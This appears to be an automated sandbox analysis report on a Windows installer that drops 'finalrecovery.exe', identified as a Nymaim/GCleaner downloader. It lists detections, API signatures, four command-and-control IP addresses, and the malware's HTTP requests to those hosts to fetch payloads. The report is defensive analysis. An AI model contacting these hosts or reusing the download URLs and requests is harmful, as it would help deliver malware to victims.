Windows Analysis Report
file.exe

AV Detection

Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe

ReversingLabs: Detection: 60%

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Joe Sandbox ML: detected

Source: 1.2.file.tmp.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.file.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.3.file.exe.23c75c8.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.file.tmp.4b375c.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.file.exe.21db608.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.file.tmp.4b375c.3.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 2.2.finalrecovery.exe.19a0000.3.raw.unpack

Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}

Cryptography

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0045C524 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,		1_2_0045C524
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0045C5D8 ArcFourCrypt,		1_2_0045C5D8
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0045C5F0 ArcFourCrypt,		1_2_0045C5F0
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_10001000 ISCryptGetVersion,		1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_10001130 ArcFourCrypt,		1_2_10001130
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,		2_2_00403770

Compliance

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Spreading

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,		1_2_00473B80
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00451DC0 FindFirstFileA,GetLastError,		1_2_00451DC0
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,		1_2_004963A0
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,		1_2_00463080
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,		1_2_004634FC
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,		1_2_00461AF4
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,		2_2_00404490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00423DAD FindFirstFileExW,		2_2_00423DAD
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007E39 FindFirstFileExW,		2_2_10007E39

Networking

Source: Traffic

Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 45.12.253.72:80 -> 192.168.2.3:49702

Source: Malware configuration extractor	IPs: 45.12.253.56
Source: Malware configuration extractor	IPs: 45.12.253.72
Source: Malware configuration extractor	IPs: 45.12.253.98
Source: Malware configuration extractor	IPs: 45.12.253.75

Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS

Source: Joe Sandbox View

IP Address: 45.12.253.72 45.12.253.72

Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.56
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72
Source: unknown	TCP traffic detected without corresponding DNS query: 45.12.253.72

Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteY
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteeF
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/puk.php
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/stuk.php
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.72/default/stuk.php2N
Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.php
Source: finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpK
Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpL
Source: finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpQ
Source: finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpc
Source: finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpd
Source: finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpi
Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpr
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phprl
Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.12.253.75/dll.phpx
Source: file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://nbafrog.com/
Source: file.exe, 00000000.00000003.324486104.0000000002131000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241488665.0000000002131000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.242648810.00000000022D8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://nbafrog.com/.
Source: is-6R8AD.tmp.1.dr	String found in binary or memory: http://www.finalrecovery.com/buy.htm
Source: file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.dr	String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/psU

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

2_2_00401B40

Source: global traffic	HTTP traffic detected: GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.56Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /default/stuk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /default/puk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: file.exe, 00000000.00000002.324966224.0000000000688000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match	File source: 2.2.finalrecovery.exe.19a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.19a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

System Summary

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409420
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_00454800

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004083E4		0_2_004083E4
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00466728		1_2_00466728
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0047EB9C		1_2_0047EB9C
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0046F304		1_2_0046F304
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0043D388		1_2_0043D388
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004440A8		1_2_004440A8
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0045E468		1_2_0045E468
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0045A510		1_2_0045A510
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004447A0		1_2_004447A0
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004687A0		1_2_004687A0
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00434900		1_2_00434900
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00430B40		1_2_00430B40
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00444BAC		1_2_00444BAC
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00484C90		1_2_00484C90
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00450D1C		1_2_00450D1C
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00443B00		1_2_00443B00
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00485BC4		1_2_00485BC4
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00433BFC		1_2_00433BFC
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0048BECC		1_2_0048BECC
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_0042FFB4		1_2_0042FFB4
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490		2_2_00404490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004096E8		2_2_004096E8
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004057C7		2_2_004057C7
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00406800		2_2_00406800
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00406AA0		2_2_00406AA0
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404D40		2_2_00404D40
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00405F40		2_2_00405F40
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00402F20		2_2_00402F20
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00415053		2_2_00415053
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00415285		2_2_00415285
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00422329		2_2_00422329
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00419490		2_2_00419490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00409670		2_2_00409670
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004267D0		2_2_004267D0
